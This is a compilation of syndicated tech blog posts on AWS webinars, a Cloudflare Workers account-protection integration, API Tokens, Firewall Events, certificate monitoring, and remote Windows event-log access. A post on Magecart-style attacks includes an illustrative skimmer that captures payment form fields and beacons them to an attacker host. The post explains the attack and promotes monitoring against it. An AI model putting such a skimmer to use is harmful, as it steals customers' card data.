October 2, 2019 | 9:00 AM – 10:00 AM PT – Deep Dive on Amazon EventBridge – Learn how to optimize event-driven applications, and use rules and policies to route, transform, and control access to these events that react to data from SaaS apps.

Storage:

September 24, 2019 | 9:00 AM – 10:00 AM PT – Optimize Your Amazon S3 Data Lake with S3 Storage Classes and Management Tools – Learn how to use the Amazon S3 Storage Classes and management tools to better manage your data lake at scale and to optimize storage costs and resources.

October 2, 2019 | 11:00 AM – 12:00 PM PT – The Great Migration to Cloud Storage: Choosing the Right Storage Solution for Your Workload – Learn more about AWS storage services and identify which service is the right fit for your business.

How Castle is Building Codeless Customer Account Protection

Post Syndicated from Guest Author original https://blog.cloudflare.com/castle-building-codeless-customer-account-protection/

This is a guest post by Johanna Larsson, of Castle, who designed and built the Castle Cloudflare app and the supporting infrastructure.

Strong security should be easy.

Asking your consumers again and again to take responsibility for their security through robust passwords and other security measures doesn’t work. The responsibility of security needs to shift from end users to the companies who serve them.

Castle is leading the way for companies to better protect their online accounts, with millions of consumers being protected every day. Uniquely, Castle extends threat prevention and protection both pre- and post-login, ensuring you can keep friction low but security high. With realtime responses and automated workflows for account recovery, overwhelmed security teams are given a hand. However, when you’re that busy, sometimes deploying new solutions takes more time than you have. Reducing time to deployment was a priority, so Castle turned to Cloudflare Workers.

User security and friction

When security is no longer optional and threats are not black or white, security teams are left with trying to determine how to allow end-user access and transaction completions when there are hints of risk, or when not all of the information is available. Keeping friction low is important to customer experience. Castle helps organizations be more dynamic and proactive by making continuous security decisions based on realtime risk and trust.

Some of the challenges with traditional solutions are that they are often just focused on protecting the app, or only focused on the point of access, protecting against bot access for example. Tools specifically designed for securing user accounts, however, are fundamentally focused on protecting the accounts of the end-users, whether they are being targeted by humans or bots. Being able to understand end-user behaviors and their devices both pre and post login is therefore critical to truly protecting each user. The key to protecting users is being able to decipher between normal and anomalous activity on an individual account and device basis. You also need a playbook to respond to anomalies and attacks with dedicated flows that allow your end users to interact directly and provide feedback around security events.

By understanding the end user and their good behaviors, devices, and transactions, it is possible to automatically respond to account threats in real-time based on risk level and policy. This approach not only reduces end-user friction but enables security teams to feel more confident that they won’t ever be blocking a legitimate login or transaction.

Castle processes tens of millions of events every day through its APIs, including contextual information like headers, IP, and device types. The more information that can be associated with a request the better. This allows us to better recognize abnormalities and protect the end user. Collection of this information is done in two ways. One is done on the web application’s backend side through our SDKs and the other is done on the client side using our mobile SDK or browser script. Our experience shows that any integration of a security service based on user behavior and anomaly detection can involve many different parties across an organization, and it affects multiple layers of the tech stack. On top of the security related roles, it’s not unusual to also have to coordinate between backend, devops, and frontend teams. The information related to an end user session is often spread widely over a code base.

The cost of security

One of the biggest challenges in implementing a user-facing security and risk management solution is the variety of people and teams it needs attention from, each with competing priorities. Security teams are often understaffed and overwhelmed, making it difficult to take on new projects. At the same time, it consumes time from product and engineering personnel on the application side, who are responsible for UX flows and performing continuous authentication post-login.

We’ve been experimenting with approaches where we can extract that complexity from your application code base, while also reducing the effort of integrating. At Castle, we believe that strong security should be easy.

With Cloudflare we found a service that enables us to create a more friendly, simple, and in the end, safe integration process by placing the security layer directly between the end user and your application. Security-related logic shouldn’t pollute your app, but should reside in a separate service, or shield, that covers your app. When the two environments are kept separate, this reduces the time and cost of implementing complex systems making integration and maintenance less stressful and much easier.

Our integration with Cloudflare aims to solve this implementation challenge, delivering end-to-end account protection for your users, both pre and post login, with the click of a button.

The codeless integration

In our quest for a purely codeless integration, key features are required. When every customer application is different, this means every integration is different. We want to solve this problem for you once and for all. To do this, we needed to move the security work away from the implementation details so that we could instead focus on describing the key interactions with the end user, like logins or bank transactions. We also wanted to empower key decision makers to recognize and handle crucial interactions in their systems. Creating a single solution that could be customized to fit each specific use case was a priority.

Building on top of Cloudflare’s platform, we made use of three unique and powerful products: Workers, Apps for Workers, and Workers KV.

Thanks to Workers we have full access to the interactions between the end user and your application. With their impressive performance, we can confidently run inline of website requests without creating noticeable latency. We will never slow down your site. And in order to achieve the flexibility required to match your specific use case, we created an internal configuration format that fully describes the interactions of devices and servers across HTTP, including web and mobile app traffic. It is in this Worker where we’ve implemented an advanced routing engine to match and collect information about requests and responses to events, directly from the edge. It also fully handles injecting the Castle browser script — one less thing to worry about.

All of this logic is kept separate from your application code, and through the Cloudflare App Store we are able to distribute this Worker, giving you control over when and where it is enabled, as well as what configurations are used. There’s no need to copy/paste code or manage your own Workers.

In order to achieve the required speed while running in distributed edge locations, we needed a high performing low latency datastore, and we found one in the Cloudflare Workers KV Store. Cloudflare Apps are not able to access the KV Store directly, but we’ve solved this by exposing it through a separate Worker that the Castle App connects to. Because traffic between Workers never leaves the Cloudflare network, this is both secure and fast enough to match your requirements. The KV Store allows us to maintain end user sessions across the world, and also gives us a place to store and update the configurations and sessions that drive the Castle App.
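
The post doesn’t spell out that proxy Worker, but the pattern looks roughly like this (a sketch: the SESSIONS binding and the /kv/ URL scheme are our own naming):

// Sketch of a Worker exposing a KV namespace to the Castle App.
// Traffic between Workers never leaves Cloudflare's network.

declare const SESSIONS: KVNamespace; // KV binding configured on this Worker

addEventListener("fetch", (event: FetchEvent) => {
  event.respondWith(handleRequest(event.request));
});

async function handleRequest(request: Request): Promise<Response> {
  const key = new URL(request.url).pathname.replace(/^\/kv\//, "");

  if (request.method === "GET") {
    const value = await SESSIONS.get(key);
    return value === null
      ? new Response("not found", { status: 404 })
      : new Response(value);
  }
  if (request.method === "PUT") {
    // Sessions expire automatically after an hour.
    await SESSIONS.put(key, await request.text(), { expirationTtl: 3600 });
    return new Response("ok");
  }
  return new Response("method not allowed", { status: 405 });
}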

In combining these products we have a complete and codeless integration that is fully configurable and that won’t slow you down.

How does it work?

The data flow is straightforward. After installing the Castle App, Cloudflare will route your traffic through the Castle App, which uses the Castle Data Store and our API to intelligently protect your end users. The impact to traffic latency is minimal because most work is done in the background, not blocking the requests. Let’s dig deeper into each technical feature:

Script injection

One of the tools we use to verify user identity is a browser script: Castle.js. It is responsible for gathering device information and UI interaction behavior, and although it is not required for our service to function, it helps improve our verdicts. This means it’s important that it is properly added to every page in your web application. The Castle App, running between the end user and your application, is able to unobtrusively add the script to each page as it is served. In order for the script to also track page interactions it needs to be able to connect them to your users, which is done through a call to our script and also works out of the box with the Cloudflare interaction. This removes 100% of the integration work from your frontend teams.
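
One way to perform this kind of unobtrusive injection in a Worker is with the HTMLRewriter API. The sketch below is our illustration rather than Castle’s actual code, and the script URL is hypothetical:

// Sketch: injecting a browser script into HTML responses from a Worker.
// HTMLRewriter streams the page, so non-HTML responses pass through untouched.

addEventListener("fetch", (event: FetchEvent) => {
  event.respondWith(injectScript(event.request));
});

async function injectScript(request: Request): Promise<Response> {
  const response = await fetch(request);
  const contentType = response.headers.get("content-type") || "";

  if (!contentType.includes("text/html")) return response; // only rewrite HTML

  return new HTMLRewriter()
    .on("head", {
      element(head) {
        head.append(
          '<script src="https://example.com/castle.js" async></script>',
          { html: true }
        );
      },
    })
    .transform(response);
}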

Collect contextual information

The second half of the information that forms the basis of our security analysis is the information related to the request itself, such as IP and headers, as well as timestamps. Gathering this information may seem straightforward, but our experience shows some recurring problems in traditional integrations. IP addresses are easily lost behind reverse proxies, as they need to be maintained in separate headers, like `X-Forwarded-For`, and the internal format of headers differs from platform to platform. Headers in general might get cut off based on whitelisting. The Castle App sees the original request as it comes in, with no outside influence or platform differences, enabling it to reliably create the context of the request. This saves your infrastructure and backend engineers from huge efforts debugging edge cases.

Advanced routing engine

Finally, in order to reliably recognize important events, like login attempts, we’ve built a fully configurable routing engine. It is fast enough to run inline with your web application, and supports near real-time configuration updates. It is powerful enough to translate requests into actual events in your system, like logins, purchases, profile updates or transactions. Using information from the request, it is then able to send this information to Castle, where you are able to analyze, verify and take action on suspicious activity. What’s even better is that at any point in the future, if you want to Castle-protect a new critical user event – such as a withdrawal or transfer event – all it takes is adding a record to the configuration file. You never have to touch application code in order to expand your Castle integration across sensitive events.
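
Castle’s configuration format is internal, so the record below is purely hypothetical. It only illustrates the idea of declaratively mapping a request pattern to a named security event, without touching application code:

// Hypothetical configuration record (the real format is Castle-internal).
// It maps an HTTP request pattern to a named security event.

const withdrawalEvent = {
  event: "$transaction.withdrawal",
  match: {
    method: "POST",
    path: "/api/v1/withdrawals",
    status: [200, 201], // only report successful withdrawals
  },
  extract: {
    userId: "response.body.user_id",
    amount: "request.body.amount",
  },
};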

We’ve put together an example TypeScript snippet that naively implements the flow and features we’ve discussed. The details are glossed over so that we can focus on the functionality.

addEventListener("fetch", event => event.respondWith(handleEvent(event)));

const handleEvent = async (event: CloudflareEvent) => {
  // You configure the application with your Castle API key
  const { apiKey } = INSTALL_OPTIONS;
  const { request } = event;

  // Configuration is fetched from the KV Store
  const configuration = await getConfiguration(apiKey);

  // The session is also retrieved from the KV Store
  const session = await getUserSession(request);

  // Pass the request through and get the response
  let response = await fetch(request);

  // Using the configuration we can recognize events by running
  // the request+response and configuration through our matching engine
  const securityEvent = getMatchingEvent(request, response, configuration);

  if (securityEvent) {
    // With direct access to the raw request, we can confidently build the context
    // including a device ID generated by the browser script, IP, and headers
    const requestContext = getRequestContext(request);

    // Collecting the relevant information, the data is passed to the Castle API
    event.waitUntil(sendToCastle(securityEvent, session, requestContext));
  }

  // Because we have access to the response HTML page we can safely inject the browser
  // script. If the response is not an HTML page it is passed through untouched.
  response = injectScript(response, session);

  return response;
};

We hope we have inspired you and demonstrated how Workers can provide speed and flexibility when implementing end to end account protection for your end users with Castle. If you are curious about our service, learn more here.

Remote Log Collection on Windows

Post Syndicated from Bozho original https://techblog.bozho.net/remote-log-collection-on-windows/

Every organization needs to collect logs from multiple sources in order to put them in either a log collector or SIEM (or a dedicated audit trail solution). And there are two options for that – using an agent and agentless.

Using an agent is easy – you install a piece of software on each machine that generates logs and it forwards them wherever needed. This is however not preferred by many organizations as it complicates things – upgrading to new versions, keeping track of dozens of configurations, and potentially impacting performance of the target machines.

So some organizations prefer to collect logs remotely, or use standard tooling, already present on the target machine. For Linux that’s typically syslog, where forwarding is configured. Logs can also be read remotely via SCP/SSH.

However, on Windows things are less straightforward. You need to access the Windows Event Log facility remotely, but there is barely a single place that describes all the required steps. This blogpost comes close, but I’d like to provide the full steps, as there are many, many things that one may miss. It is a best practice to use a non-admin service account for that, and you have to grant multiple permissions to allow reading the event logs remotely.

There are also multiple ways to read the logs remotely:

  • Through the Event Viewer UI – it’s the simplest to get right, as only one domain group is required for access
  • Through Win32 native API calls (and DCOM) – i.e. EvtOpenSession and the related methods
  • Through PowerShell Get-WinEvent (Get-EventLog is a legacy cmdlet that doesn’t support remoting)
  • Through WMI directly. To be honest, I don’t know whether the native calls and the PowerShell cmdlets use WMI and/or CIM underneath as well – they probably do.

So, in order to get these options running, the following configurations have to be done:

  1. Allow the necessary network connections to the target machines (through network rules and firewall rules, if applicable)
  2. Go to Windows Firewall -> Inbound rules and enable the rules regarding “Remote log management”
  3. Create a service account and configure it in the remote collector. The other option is to have an account on the collector machine that is given the proper access, so that you can use the integrated AD authentication
  4. Add the account to the following domain groups: Event log readers, Distributed COM users. The linked article above mentions “Remote management users” as well, but that’s optional if you just want to read the logs
  5. Give the “Manage auditing and security log” privilege to the service account through group policies (GPO) or via “local security policy”. Find it under User Rights Assignment > Manage auditing and security log
  6. Give WMI access – open “wmimgmt” -> right click -> properties > Security -> Advanced and allow the service account to “Execute Methods”, “Provider Write”, “Enable Account”, “Remote Enable”. To be honest, I’m not sure exactly which folder that should be applied to, and applying it to the root may be too wide, so you’d have to experiment
  7. Give registry permissions: Regedit -> Local machine -> System\CurrentControlSet\Services\eventlog\Security -> right click -> permissions and add the service account. According to the linked post you also have to modify a particular registry entry, but that’s not required just for reading the log. This step is probably the most bizarre and unexpected one.
  8. Make sure you have DCOM rights. This comes automatically with the DCOM group, but double check via DCOMCnfg -> right click -> COM security
  9. Grant permissions for the service account on c:\windows\system32\winevt. This step is not required for “simple” reading of the logs, but I’ve seen it in various places, so in some scenarios you might need to check it
  10. Make sure the application or service that is reading the logs remotely has sufficient permissions – it can usually run with admin privileges, because it’s on a separate, dedicated machine.
  11. Restart services – that is optional, but can be done just in case: Restart “Windows Remote Management (WS-Management)” and “Windows Event Log” on the target machine

As you can see, there are many things that you can miss, and there isn’t a single place in any documentation that lists all those steps (though there are good guides that go in a slightly different direction).

I can’t help but make a high-level observation here – the need to do everything above is an example of how security measures can “explode” and become really hard to manage. There are many services, groups, privileges, policies, inbound rules and whatnot, instead of just “Allow remote log reading for this user”. I know it’s inherently complex, but maybe security products should make things simpler by providing recipes for typical scenarios. Following guides in some blog is definitely worse than running a predefined set of commands. And running the “Allow remote access to event log” recipe would do just what you need. Of course, knowing which recipe to run and how to parameterize it would require specific knowledge, but you can’t do security without trained experts.

The post Remote Log Collection on Windows appeared first on Bozho's tech blog.

Announcing the General Availability of API Tokens

Post Syndicated from Garrett Galow original https://blog.cloudflare.com/api-tokens-general-availability/

APIs at Cloudflare

Today we are announcing the general availability of API Tokens – a scalable and more secure way to interact with the Cloudflare API. As part of making a better internet, Cloudflare strives to simplify manageability of a customer’s presence at the edge. Part of the way we do this is by ensuring that all of our products and services are configurable by API. Customers ranging from partners to enterprises to developers want to automate management of Cloudflare. Sometimes that is done via our API directly, and other times it is done via open source software we help maintain like our Terraform provider or Cloudflare-Go library. It is critical that customers who are automating management of Cloudflare can keep their Cloudflare services as secure as possible.

Least Privilege and Why it Matters

Securing software systems is hard. Limiting what a piece of software can do is a good defense to prevent mistakes or malicious actions from having greater impact than they could. The principle of least privilege helps guide how much access a given system should have to perform actions. Originally formulated by Jerome Saltzer, “Every program and every privileged user of the system should operate using the least amount of privilege necessary to complete the job.” In the case of Cloudflare, many customers have various domains routing traffic leveraging many different services. If a bad actor gets unauthorized access to a system they can use whatever access that system has to cause further damage or steal additional information.

Let’s see how the capabilities of API Tokens fit into the principle of least privilege.

About API Tokens

API Tokens provide three main capabilities:

  1. Scoping API Tokens by Cloudflare resource
  2. Scoping API Tokens by permission
  3. The ability to provision multiple API Tokens

Let’s break down each of these capabilities.

Scoping API Tokens by Cloudflare Resource

Cloudflare separates service configuration by zone which typically equates to a domain. Additionally, some customers have multiple accounts each with many zones. It is important that when granting API access to a service it only has access to the accounts resources and zones that are pertinent for the job at hand. API Tokens can be scoped to only cover specific accounts and specific zones. One common use case is if you have a staging zone and a production zone, then an API Token can be limited to only be able to affect the staging zone and not have access to the production zone.

Scoping API Tokens by Permission

Being able to scope an API Token to a specific zone is great, but in one zone there are many different services that can be configured: firewall rules, page rules, and load balancers just to name a few. If a customer has a service that should only be able to create new firewall rules in response to traffic patterns, then also allowing that service to change DNS records is a violation of least privilege. API Tokens allow you to scope each token to specific permission. Multiple permissions can be combined to create custom tokens to fit specific use cases.

Multiple API Tokens

If you use Cloudflare to protect and accelerate multiple services, then you may be making API changes to Cloudflare from multiple locations – different servers, VMs, containers, or workers. Being able to create an API Token per service means each service is insulated from changes to the others. If one API Token is leaked or needs to be rolled, there won’t be any impact to the other services’ API Tokens. The capabilities mentioned previously also mean that each service can be scoped to exactly the actions and resources necessary. This allows customers to better realize the practice of least privilege for accessing Cloudflare by API.

Now let’s walk through how to create an API Token and use it.

Using API Tokens

To create your first API Token go to the ‘API Tokens’ section of your user profile which can be found here: dash.cloudflare.com/profile/api-tokens

1. On this page, you will find both a list of all of your API Tokens in addition to your Global API Key and Origin CA Key.

(Screenshot: API Tokens Getting Started – Create Token)

To create your first API Token, select ‘Create Token’.


2. On the create screen there are two ways to create your token. You can create it from scratch through the ‘Custom’ option or you can start with a predefined template by selecting ‘Start with a template’.

(Screenshot: API Token Template Selection)

For this case, we will use the ‘Edit zone DNS’ template to create an API Token that can edit a single zone’s DNS records.


3. Once the template is selected, we need to pick a zone for the API Token to be scoped to. Notice that the DNS Edit permission was already pre-selected.

(Screenshot: specifying the zone for which the token will be able to control DNS)

In this case, ‘garrettgalow.com’ is selected as the Cloudflare zone that the API Token will be able to edit DNS records for.


4. Once I select continue to summary, I’m given a chance to review my selection. In this case the resources and permissions are quite simple, but this gives you a chance to make sure you are giving the API Token exactly the correct amount of privilege before creating it.

(Screenshot: Token Summary – confirmation)


5. Once created, we are presented with the API Token. This screen is the only time you will be presented with the secret so be sure to put the secret in a safe place! Anyone with this secret can perform the granted actions on the resources specified so protect it like a password. In the below screenshot I have black boxed the secret for obvious reasons. If you happen to lose the secret, you can always regenerate it from the API Tokens table so you don’t have to configure all the permissions again.

(Screenshot: token creation completion screen with the token secret)

In addition to the secret itself, this screen provides an example curl request that can be used to verify that the token was successfully created. It also provides an example of how the token should be used for any direct HTTP requests. With API Tokens, we now follow the standard Authorization: Bearer scheme (RFC 6750). Calling that API, we see a successful response telling us that the token is valid and active:

~$ curl -X GET "https://api.cloudflare.com/client/v4/user/tokens/verify" \
>      -H "Authorization: Bearer vh9awGupxxxxxxxxxxxxxxxxxxx" \
>      -H "Content-Type:application/json" | jq

{
  "result": {
    "id": "ad599f2b67cdccf24a160f5dcd7bc57b",
    "status": "active"
  },
  "success": true,
  "errors": [],
  "messages": [
    {
      "code": 10000,
      "message": "This API Token is valid and active",
      "type": null
    }
  ]
}
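
From there, the token is used the same way against any endpoint it has permission for. For example, listing the DNS records of the zone it was scoped to (a sketch: the zone ID is a placeholder, and fetch() is available in Workers and Node 18+):

// Using a scoped API Token to list DNS records. The token is read from the
// environment rather than hard-coded, since it should be treated like a password.

const ZONE_ID = "<your-zone-id>"; // placeholder
const API_TOKEN = process.env.CF_API_TOKEN;

async function listDnsRecords() {
  const resp = await fetch(
    `https://api.cloudflare.com/client/v4/zones/${ZONE_ID}/dns_records`,
    { headers: { Authorization: `Bearer ${API_TOKEN}` } }
  );
  const body: any = await resp.json();
  if (!body.success) throw new Error(JSON.stringify(body.errors));
  return body.result; // array of DNS records
}

listDnsRecords().then(records => console.log(records.length, "records"));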

What’s coming next

For anyone using the Cloudflare API, we recommend moving to using API Tokens over their predecessor API Keys going forward. With this announcement, our Terraform provider, Cloudflare-Go library, and WordPress plugin are all updated for API Token compatibility. Other libraries will receive updates soon. Both API Tokens and API Keys will be supported for the time being for customers to be able to safely migrate. We have more planned capabilities for API Tokens to further safeguard how and when tokens are used, so stay tuned for future announcements!

Let us know what you think and what you’d like to see next regarding API security on the Cloudflare Community.

Supercharging Firewall Events for Self-Serve

Post Syndicated from Alex Cruz Farmer original https://blog.cloudflare.com/supercharging-firewall-events-for-self-serve/

Today, I’m very pleased to announce the release of a completely overhauled version of our Firewall Event log to our Free, Pro and Business customers. This new Firewall Events log is now available in your Dashboard, and you are not required to do anything to receive this new capability.

No more modals!

We have done away with those pesky modals, providing a much smoother user experience. To review more detailed information about an event, you simply click anywhere on the event list row.

In the expanded view, you are provided with all the information you may need to identify or diagnose issues with your Firewall or find more details about a potential threat to your application.

Additional matches per event

Cloudflare has several Firewall features to give customers granular control of their security. With this control comes some complexity when debugging why a request was stopped by the Firewall. To help clarify what happened, we have provided an “Additional matches” count at the bottom for events triggered by multiple services or rules for the same request. Clicking the number expands a list showing each rule and service along with the corresponding action.

Search for any field within a Firewall Event

This is one of my favourite parts of our new Firewall Event Log. Many of our customers have expressed their frustration with the difficulty of pinpointing specific events. This is where our new search capabilities come into their own. Customers can now filter and freeform search for any field that is visible in a Firewall Event!

Let’s say you want to find all the requests originating from a specific ISP or country where your Firewall Rules issued a JavaScript challenge. There are two different ways to do this in the UI.

Firstly, when in the detail view, you can create an include or exclude filter for that field value.

Secondly, you can create a freeform filter using the “+ Add Filter” button at the top, or edit one of the already filtered fields.

As illustrated above, with our WAF Managed Rules enabled in log only, we can see all the rules which would have triggered if this was a legitimate attack. This allows you to confirm that your configuration is working as expected.

Scoping your search to a specific date and time

In our old Firewall Event Log, to find an event, users had to traverse through many pages to find Events from a specific date. The last major change we have added is the capability to select a time window to view events between two points in time over the last 2 weeks. In the time selection window, Free and Pro customers can choose a 24 hour time window and our Business customers can view up to 72 hours.

We want your feedback!

We need your help! Please feel free to leave any feedback on our Community forums, or open a Support ticket with any problems you find. Your feedback is critical to our product improvement process, and we look forward to hearing from you.

Protecting JavaScript Files (From Magecart-Style Attacks)

Post Syndicated from Bozho original https://techblog.bozho.net/protecting-javascript-files-from-magecart-attacks/

Most web pages now consist of multiple JavaScript files that are included in various ways (via <script> tags or in some more dynamic fashion, bundled and minified or not). But since these scripts interact with everything on the page, they can be a security risk.

And Magecart showcased that risk – the group attacked multiple websites, including British Airways and Ticketmaster, and stole a few hundred thousand credit card numbers.

It is a simple attack where an attacker inserts a malicious JavaScript snippet into a trusted JavaScript file, collects credit card details entered into payment forms, and sends them to an attacker-owned website. Obviously, the easy part is writing the malicious JavaScript; the hard part is getting it onto the target website.
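
To make the mechanics concrete, here is an illustrative reconstruction of such a skimmer (not actual code from the incidents). A handful of lines hidden inside a trusted bundle are enough:

// Illustrative Magecart-style skimmer. It serializes payment form fields
// on submit and beacons them to an attacker-controlled host.

document.addEventListener("submit", (e: Event) => {
  const form = e.target as HTMLFormElement;
  const stolen: Record<string, string> = {};
  new FormData(form).forEach((value, key) => {
    stolen[key] = String(value); // card number, CVV, expiry, name...
  });
  // sendBeacon survives page navigation, so the user notices nothing.
  navigator.sendBeacon("https://attacker.example/collect", JSON.stringify(stolen));
});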

Many websites rely on externally hosted assets (including scripts) – be it a CDN, or a dedicated asset server (as in the case of British Airways). These externally hosted assets may be vulnerable in several ways:

  • Asset servers may be less protected than the actual server, because they are just static assets, what could go wrong?
  • Credentials to access CDN configuration may be leaked which can lead to an attacker replacing the original source scripts with their own
  • Man-in-the-middle attacks are possible if the asset server is misconfigured (e.g. allowing TLS downgrade attack)
  • The external service (e.g. CDN) that was previously trusted can go rogue – that’s unlikely with big providers, but smaller and cheaper ones are less predictable

Once the attackers have replaced the script, they are silently collecting data until they are caught. And this can be a long time.

So how to protect against those attacks? A typical piece of advice is to introduce a content security policy, which will prevent scripts from untrusted domains from being executed. This is a good idea, but doesn’t help in the scenario where a trusted domain is compromised. There are several main approaches, and I’ll summarize them below:

  • Subresource integrity – this is a browser feature that lets you specify the hash of a script file and validates that hash when the page loads. If it doesn’t match the hash of the actually loaded script, the script is blocked. This sounds great, but has several practical implications. First, it means you need to complicate your build pipeline so that it calculates the hashes of minified and bundled resources and injects those hashes into the page templates (see the sketch after this list). It’s a tedious process, but it’s doable. Then there are the dynamically loaded scripts where you can’t use this feature, and there are the browsers that don’t support it fully (Edge, IE and Safari on mobile). And finally, if you don’t have a good build pipeline (which many small websites don’t), a very small legitimate change in the script can break your entire website.
  • Don’t use external services – that sounds straightforward but it isn’t always. CDNs exist for a reason and optimize your site loading speeds and therefore ranking, internal policies may require using a dedicated asset server, sometimes plugins (e.g. for WordPress) may fetch external resources. An exception to this rule is allowed if you somehow sandbox the third party script (e.g. via iframe as explained in the link above)
  • Secure all external servers properly – if you can do that, that’s great – upgrade the supported cipher suites, monitor for 0days, use only highly trusted CDNs. Regardless of anything, you should obviously always strive to do that. But it requires expertise and resources, which may not be available to every company and every team.
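
To make the subresource integrity option concrete, here is a small sketch (mine, with placeholder paths) that computes the hash for a bundled script and prints the tag to embed:

import { createHash } from "crypto";
import { readFileSync } from "fs";

// Computes a subresource integrity (SRI) hash for a script and prints the
// corresponding tag. The browser refuses to run the script if the fetched
// bytes no longer hash to this value.

function sriTag(filePath: string, publicUrl: string): string {
  const digest = createHash("sha384").update(readFileSync(filePath)).digest("base64");
  return `<script src="${publicUrl}" integrity="sha384-${digest}" crossorigin="anonymous"></script>`;
}

console.log(sriTag("./dist/app.min.js", "https://cdn.example.com/app.min.js"));
// Rebuilding the bundle changes the digest, so this has to run as part of
// the build pipeline - exactly the complication described above.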

There is one more scenario that may sound strange – if an attacker hacks into your main application server(s), they can replace the scripts with whatever they want. It sounds strange at first, because if they have access to the server, it’s game over anyway. But it’s not always full access with RCE – it might be limited access. Credit card numbers are usually not stored in plain text in the database, so having access to the application server may not mean you have access to the credit card numbers. And changing the custom backend code to collect the data is much more unpredictable and time-consuming than just replacing the scripts with malicious ones. None of the options above protects against that (as in this case the attacker may be able to change the expected hash for the subresource integrity check).

Because of the limitations of the above approaches, at my company we decided to provide a tool to monitor your website for such attacks. It’s called Scriptinel.com (short for Script Sentinel) and is currently in early beta. It’s mainly targeted at small website owners who can’t implement any of the three approaches above, but it can be used for sophisticated websites as well.

What it does is straightforward – it scans a given URL, extracts all scripts from it (even the dynamic ones), and starts monitoring them for changes with periodic requests. If it discovers a change, it notifies the website owner so that they can react.
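
Conceptually, the core check is nothing more exotic than the following sketch (not Scriptinel’s actual code; the script URL, stored-hash file, and alert address are all made up for illustration):

URL="https://cdn.example.com/app.min.js"      # hypothetical script URL found during the scan
EXPECTED="$(cat app.min.js.sha256)"           # hash recorded at the last known-good scan
ACTUAL="$(curl -fsSL "$URL" | sha256sum | cut -d' ' -f1)"
if [ "$ACTUAL" != "$EXPECTED" ]; then
  # notify the website owner so they can inspect the change
  mail -s "Script change detected: $URL" owner@example.com <<< "Expected $EXPECTED, got $ACTUAL"
fi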

This means that the attacker may have a few minutes to collect data, but time is an important factor here – this is not a “SELECT *” data breach; it relies on customers using the website. So a few minutes minimizes the damage. And it doesn’t break your website (though we could offer an embeddable script that blocks the page if Scriptinel has found discrepancies). It also doesn’t require changes in the build process to include hashes. Of course, such a reactive approach is not perfect, especially if there is nobody to react, but monitoring is a good idea regardless of whether other approaches are used.

There is the issue of protected pages and pages that are not directly accessible via a GET request – e.g. a payment page. For that you can enter your javascript files individually, rather than having the tool scan the page. We can add a more sophisticated user journey scan, with specifying credentials and steps to reach the protected pages, but for now that seems unnecessary.

How does it solve the “main server compromised” problem? Well, nothing solves that perfectly, as the attacker can make changes that serve the legitimate version of the script to your monitoring servers (identifying them by IP) and the modified scripts to everyone else. This can be done on compromised external asset servers as well (though not with leaked CDN credentials). However, this implies the attacker knows that Scriptinel is used, knows the IP addresses of our scanners, and has gained sufficient control to serve different versions based on IP. This raises the bar significantly, and the attack can even be made impossible to pull off if we regularly rotate the IP addresses within a sufficiently large range.

Such functionality may be available in some enterprise security suites, though I’m not aware of it (if it exists somewhere, please let me know).

Overall, the problem is niche, but tough, and not solving it can lead to serious data breaches even if your database is perfectly protected. Scriptinel is a simple-to-use, good-enough solution (and one that’s arguably better than the other options).

Good information security is the right combination of knowledge, implementation of best practices, and tools to help you with that. And maybe Scriptinel is one such tool.

The post Protecting JavaScript Files (From Magecart-Style Attacks) appeared first on Bozho's tech blog.

Introducing Certificate Transparency Monitoring

Post Syndicated from Ben Solomon original https://blog.cloudflare.com/introducing-certificate-transparency-monitoring/

Today we’re launching Certificate Transparency Monitoring (my summer project as an intern!) to help customers spot malicious certificates. If you opt into CT Monitoring, we’ll send you an email whenever a certificate is issued for one of your domains. We crawl all public logs to find these certificates quickly. CT Monitoring is available now in public beta and can be enabled in the Crypto Tab of the Cloudflare dashboard.

Background

Most web browsers include a lock icon in the address bar. This icon is actually a button — if you’re a security advocate or a compulsive clicker (I’m both), you’ve probably clicked it before! Here’s what happens when you do just that in Google Chrome:

[Screenshot: Chrome’s page security panel reporting a valid certificate and a secure connection]

This seems like good news. The Cloudflare blog has presented a valid certificate, your data is private, and everything is secure. But what does this actually mean?

Certificates

Your browser is performing some behind-the-scenes work to keep you safe. When you request a website (say, cloudflare.com), the website should present a certificate that proves its identity. This certificate is like a stamp of approval: it says that your connection is secure. In other words, the certificate proves that content was not intercepted or modified while in transit to you. An altered Cloudflare site would be problematic, especially if it looked like the actual Cloudflare site. Certificates protect us by including information about websites and their owners.

We pass around these certificates because the honor system doesn’t work on the Internet. If you want a certificate for your own website, just request one from a Certificate Authority (CA), or sign up for Cloudflare and we’ll do it for you! CAs issue certificates just as real-life notaries stamp legal documents. They confirm your identity, look over some data, and use their special status to grant you a digital certificate. Popular CAs include DigiCert, Let’s Encrypt, and Sectigo. This system has served us well because it has not only kept imposters in check, but also promoted trust between domain owners and their visitors.

Unfortunately, nothing is perfect.

It turns out that CAs make mistakes. In rare cases, they become reckless. When this happens, illegitimate certificates are issued (even though they appear to be authentic). If a CA accidentally issues a certificate for your website, but you did not request the certificate, you have a problem. Whoever received the certificate might be able to:

  1. Steal login credentials from your visitors.
  2. Interrupt your usual services by serving different content.

These attacks do happen, so there’s good reason to care about certificates. More often, domain owners lose track of their certificates and panic when they discover unexpected certificates. We need a way to prevent these situations from ruining the entire system.

Certificate Transparency

Ah, Certificate Transparency (CT). CT solves the problem I just described by making all certificates public and easy to audit. When CAs issue certificates, they must submit certificates to at least two “public logs.” This means that collectively, the logs carry important data about all trusted certificates on the Internet. Several companies offer CT logs — Google has launched a few of its own. We announced Cloudflare’s Nimbus log last year.

Logs are really, really big, and often hold hundreds of millions of certificate records.
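
You can explore this data yourself. For example, crt.sh offers a public search interface over CT logs; a query like the one below (the domain is a placeholder) returns every logged certificate for a domain and its subdomains as JSON:

curl -fsSL 'https://crt.sh/?q=%25.example.com&output=json'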

The log infrastructure helps browsers validate websites’ identities. When you request cloudflare.com in Safari or Google Chrome, the browser will actually require Cloudflare’s certificate to be registered in a CT log. If the certificate isn’t found in a log, you won’t see the lock icon next to the address bar. Instead, the browser will tell you that the website you’re trying to access is not secure. Are you going to visit a website marked “NOT SECURE”? Probably not.

There are systems that audit CT logs and report illegitimate certificates. Therefore, if your browser finds a valid certificate that is also present in a public log, everything is secure.

What We’re Announcing Today

Cloudflare has been an industry leader in CT. In addition to Nimbus, we launched a CT dashboard called Merkle Town and explained how we made it. Today, we’re releasing a public beta of Certificate Transparency Monitoring.

